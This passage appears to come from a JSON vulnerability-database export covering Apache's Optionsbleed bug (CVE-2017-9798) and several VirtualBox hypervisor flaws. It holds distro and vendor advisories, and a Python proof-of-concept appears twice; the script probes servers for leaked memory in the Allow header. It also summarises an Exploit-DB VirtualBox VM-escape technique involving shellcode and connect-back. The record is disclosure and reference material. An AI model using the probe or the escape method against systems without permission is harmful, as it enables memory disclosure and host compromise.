try:\n allow = str(r.headers[\"Allow\"])\n except KeyError:\n return False\n if allow in dup:\n return\n dup.append(allow)\n if allow == \"\":\n print(\"[empty] %s\" % (url))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\n z = [x.strip() for x in allow.split(',')]\n if len(z) > len(set(z)):\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\n elif args.all:\n print(\"[ok] %s: %s\" % (url, repr(allow)))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\n else:\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\n return True\n\n\nparser = argparse.ArgumentParser(\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\n \"Explanation of results:\\n\"\n \"[bleed] corrupted header found, vulnerable\\n\"\n \"[empty] empty allow header, does not make sense\\n\"\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\n \"[ok] normal list found (only shown with -a/--all)\\n\",\n formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument('hosttocheck', action='store',\n help='The hostname you want to test against')\nparser.add_argument('-n', nargs=1, type=int, default=[10],\n help='number of tests (default 10)')\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\n help=\"show headers from hosts without problems\")\nparser.add_argument(\"-u\", \"--url\", action='store_true',\n help=\"pass URL instead of hostname\")\nargs = parser.parse_args()\nhowoften = int(args.n[0])\n\ndup = []\n\n# Note: This disables warnings about the lack of certificate verification.\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\n# even if they are shipped with invalid certificates.\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\n\nif args.url:\n test_bleed(args.hosttocheck, args)\nelse:\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\n for i in range(howoften):\n try:\n if test_bleed(prefix+args.hosttocheck, args) is False:\n break\n except Exception as e:\n pass", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2018-10-07T14:32:23", "description": "VirtualBox 5.2.6.r120293 - VM Escape. Local exploit for Linux platform", "published": "2018-08-28T00:00:00", "type": "exploitdb", "title": "VirtualBox 5.2.6.r120293 - VM Escape", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2844"], "modified": "2018-08-28T00:00:00", "id": "EDB-ID:45372", "href": "https://www.exploit-db.com/exploits/45372/", "sourceData": "Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000 \r\n\r\nI didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected. \r\n\r\nFind a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative. \r\n\r\nIn the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.\r\n\r\nThe proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844\r\n\r\nhttps://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html\r\nhttps://github.com/renorobert/virtualbox-cve-2018-2844\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45372/"}, {"lastseen": "2017-09-18T19:03:27", "description": "Apache - HTTP OPTIONS Memory Leak. CVE-2017-9798. Webapps exploit for Linux platform", "published": "2017-09-18T00:00:00", "type": "exploitdb", "title": "Apache - HTTP OPTIONS Memory Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "EDB-ID:42745", "href": "https://www.exploit-db.com/exploits/42745/", "sourceData": "#!/usr/bin/env python3\r\n\r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00c3\u00b6ck\r\n\r\nimport argparse\r\nimport urllib3\r\nimport re\r\n\r\n\r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n\r\ndup = []\r\n\r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n\r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42745/"}], "zdi": [{"lastseen": "2020-06-22T11:40:37", "bulletinFamily": "info", "cvelist": ["CVE-2018-2860"], "description": "This vulnerability allows remote attackers to escalate privileges on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the handling of HGCM. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-783", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-783/", "title": "(Pwn2Own) Oracle Virtualbox HGCM Out-Of-Bounds Write Privilege Escalation Vulnerability ", "type": "zdi", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-2860"], "description": "This vulnerability allows local attackers to disclose sensitive information on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the handling of HGCM. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-07-26T00:00:00", "id": "ZDI-18-782", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-782/", "title": "(Pwn2Own) Oracle Virtualbox HGCM Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:40:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-2835"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crStateTrackMatrixNV method. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-303", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-303/", "title": "Oracle VirtualBox crStateTrackMatrixNV Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:47", "bulletinFamily": "info", "cvelist": ["CVE-2018-2837"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crStateProgramParameters4dvNV method. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-305", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-305/", "title": "Oracle VirtualBox crStateProgramParameters4dvNV Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-2836"], "description": "This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of Oracle VirtualBox. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the crUnpackExtendLockArraysEXT method. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to escalate privileges and execute code under the context of the hypervisor.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-04-18T00:00:00", "id": "ZDI-18-304", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-304/", "title": "Oracle VirtualBox crUnpackExtendLockArraysEXT Out-Of-Bounds Write Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe following packages have been upgraded to a later upstream version: httpd24-httpd (2.4.27). (BZ#1461819)\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\nBug Fix(es):\n\n* The httpd package installation script tried to create both the \"apache\" user and group in a single \"useradd\" command. Consequently, when the \"apache\" group had already been created on the system, the command failed, and the \"apache\" user was not created. To fix this bug, the \"apache\" group is now created by a separate command, and the \"apache\" user is correctly created during httpd installation even when the \"apache\" group exists. (BZ#1486843)\n\n* When installing the httpd24 Software Collection using the \"yum\" command, if the \"apache\" group already existed on the system with GID other than 48, the \"apache\" user was not created. This update fixes the bug. (BZ#1487164)\n\n* With this update, it is possible to run the mod_rewrite external mapping program as a non-root user. (BZ#1486832)\n\n* On a Red Hat Enterprise Linux 6 system, when the httpd service was stopped twice in a row by running the \"service httpd stop\" command, a misleading message was returned: \"Stopping httpd: [FAILED]\". This bug has been fixed. (BZ#1418395)\n\n* When the \"service httpd24-httpd graceful\" command was used on Red Hat Enterprise Linux 7 while the httpd24-httpd service was not running, the daemon was started without being tracked by systemd. As a consequence, the daemon ran in an incorrect SELinux domain. This bug has been fixed, and the httpd daemon runs in the correct SELinux domain in the described scenario. (BZ#1440858)\n\nEnhancement(s):\n\n* With this update, the mod_ssl module supports the ALPN protocol on Red Hat Enterprise Linux 7.4 and later versions. (BZ#1327548)\n\nFor further details, see the Red Hat Software Collections 3.0 Release Notes linked from the References section.", "modified": "2018-06-13T01:28:16", "published": "2017-10-24T12:16:35", "id": "RHSA-2017:3018", "href": "https://access.redhat.com/errata/RHSA-2017:3018", "type": "redhat", "title": "(RHSA-2017:3018) Moderate: httpd24 security, bug fix, and enhancement update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.", "modified": "2018-04-12T03:32:53", "published": "2017-10-11T19:17:48", "id": "RHSA-2017:2882", "href": "https://access.redhat.com/errata/RHSA-2017:2882", "type": "redhat", "title": "(RHSA-2017:2882) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "\nThe Fuzzing Project reports:\n\nApache httpd allows remote attackers to read secret data from\n\t process memory if the Limit directive can be set in a user's\n\t .htaccess file, or if httpd.conf has certain misconfigurations,\n\t aka Optionsbleed. This affects the Apache HTTP Server through\n\t 2.2.34 and 2.4.x through 2.4.27. The attacker sends an\n\t unauthenticated OPTIONS HTTP request when attempting to read\n\t secret data. This is a use-after-free issue and thus secret data\n\t is not always sent, and the specific data depends on many factors\n\t including configuration. Exploitation with .htaccess can be\n\t blocked with a patch to the ap_limit_section function in\n\t server/core.c.\n\n", "edition": 5, "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "76B085E2-9D33-11E7-9260-000C292EE6B8", "href": "https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html", "title": "Apache -- HTTP OPTIONS method can leak server memory", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2017-09-22T18:54:37", "published": "2017-09-22T18:54:37", "id": "FEDORA:092E9605F081", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: httpd-2.4.27-3.fc26", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2017-09-30T07:40:09", "published": "2017-09-30T07:40:09", "id": "FEDORA:A9847604E850", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: httpd-2.4.27-8.fc27", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2020-12-24T14:26:49", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch (2.4) is at;\n\nCVE-2017-9798-patch-2.4.patch\n\nSource code patch (2.2) is at;\n\nCVE-2017-9798-patch-2.2.patch\n\nNote 2.2 is end-of-life, no further release with this fix is planned. Users\nare encouraged to migrate to 2.4.28 or later for this and other fixes.\n", "edition": 5, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "id": "HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-10-05T21:53:57", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.4.27/CVE-2017-9798-patch-2.4.patch\n\n", "edition": 1, "modified": "2017-10-05T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:3647863A8E4AE972669D5EE60974E777", "title": "Apache Httpd < 2.4.28: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-30T11:53:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.4.27/CVE-2017-9798-patch-2.4.patch\n\n", "edition": 2, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:42FA2547862AB3B3F5E7F776E2D90614", "title": "Apache Httpd < 2.4.28-dev: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-30T11:53:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.2.32 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.34/CVE-2017-9798-patch-2.2.patch\n\nNote 2.2 is end-of-life, no further release with this fix is planned. Users\nare encouraged to migrate to 2.4.28 or later for this and other fixes.\n", "edition": 2, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:FDE6D747713B6B9D98F74AC2CD3A4CA7", "title": "Apache Httpd < 2.2.35-dev: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "**Issue Overview:**\n\nApache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration.([CVE-2017-9798 __](<https://access.redhat.com/security/cve/CVE-2017-9798>))\n\n \n**Affected Packages:** \n\n\nhttpd24, httpd\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \nRun _yum update httpd_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-tools-2.2.34-1.15.amzn1.i686 \n httpd-devel-2.2.34-1.15.amzn1.i686 \n mod_ssl-2.2.34-1.15.amzn1.i686 \n httpd-2.2.34-1.15.amzn1.i686 \n httpd-debuginfo-2.2.34-1.15.amzn1.i686 \n mod24_proxy_html-2.4.27-3.73.amzn1.i686 \n mod24_session-2.4.27-3.73.amzn1.i686 \n httpd24-devel-2.4.27-3.73.amzn1.i686 \n httpd24-2.4.27-3.73.amzn1.i686 \n httpd24-debuginfo-2.4.27-3.73.amzn1.i686 \n httpd24-tools-2.4.27-3.73.amzn1.i686 \n mod24_ssl-2.4.27-3.73.amzn1.i686 \n mod24_ldap-2.4.27-3.73.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.34-1.15.amzn1.noarch \n httpd24-manual-2.4.27-3.73.amzn1.noarch \n \n src: \n httpd-2.2.34-1.15.amzn1.src \n httpd24-2.4.27-3.73.amzn1.src \n \n x86_64: \n httpd-tools-2.2.34-1.15.amzn1.x86_64 \n httpd-devel-2.2.34-1.15.amzn1.x86_64 \n httpd-2.2.34-1.15.amzn1.x86_64 \n mod_ssl-2.2.34-1.15.amzn1.x86_64 \n httpd-debuginfo-2.2.34-1.15.amzn1.x86_64 \n mod24_ldap-2.4.27-3.73.amzn1.x86_64 \n httpd24-debuginfo-2.4.27-3.73.amzn1.x86_64 \n httpd24-tools-2.4.27-3.73.amzn1.x86_64 \n mod24_proxy_html-2.4.27-3.73.amzn1.x86_64 \n httpd24-devel-2.4.27-3.73.amzn1.x86_64 \n httpd24-2.4.27-3.73.amzn1.x86_64 \n mod24_ssl-2.4.27-3.73.amzn1.x86_64 \n mod24_session-2.4.27-3.73.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-09-18T15:32:00", "published": "2017-09-18T15:32:00", "id": "ALAS-2017-896", "href": "https://alas.aws.amazon.com/ALAS-2017-896.html", "title": "Important: httpd24, httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "[2.4.6-67.0.1.el7_4.5]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-67.5]\n- Resolves: #1493064 - CVE-2017-9798 httpd: Use-after-free by limiting\n unregistered HTTP method", "edition": 4, "modified": "2017-10-11T00:00:00", "published": "2017-10-11T00:00:00", "id": "ELSA-2017-2882", "href": "http://linux.oracle.com/errata/ELSA-2017-2882.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.27-i586-2_slack14.2.txz: Rebuilt.\n This update patches a security issue (\"Optionsbleed\") with the OPTIONS http\n method which may leak arbitrary pieces of memory to a potential attacker.\n Thanks to Hanno Bo:ck.\n For more information, see:\n http://seclists.org/oss-sec/2017/q3/477\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.34-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.34-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.34-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.34-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.34-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.34-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.27-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.27-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.27-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.27-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.27-i586-2_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.27-x86_64-2_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.27-i586-3.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.27-x86_64-3.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n1d84028976a221517f3880891d82240d httpd-2.2.34-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n22dd84ddbaaa226f439966b4dff9f8e0 httpd-2.2.34-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\nb4b5d21bae978270445fa8e03b5b77a9 httpd-2.2.34-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\nd9f4cd3c883ddb34c6855dc387d373f4 httpd-2.2.34-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\nec970592d7e91ed417a9bbaf7ad495d5 httpd-2.2.34-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nd8286c041210b312d9facc3b7912e97f httpd-2.2.34-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\ne152b68187918dc592a5346c79b7c05d httpd-2.4.27-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n711abde18d484661f731422d333931ea httpd-2.4.27-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n7db6d646d14d9dd0ba3422bc6a5187e2 